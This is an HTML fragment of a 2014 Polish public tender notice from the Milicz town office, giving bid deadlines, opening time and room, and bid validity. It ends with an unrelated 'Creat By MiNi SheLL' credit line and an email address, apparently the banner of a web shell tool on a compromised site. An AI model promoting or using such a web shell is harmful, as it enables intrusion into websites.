<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2014 godzina 10:00, miejsce: Urząd Miejski w Miliczu, ul. Trzebnicka 2, 56-300 Milicz, pok. nr 15 ( Punkt Obsługi Mieszkańców), otwarcie ofert: 05.08.2014, godz. 10:30, sala nr 4 (na parterze).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com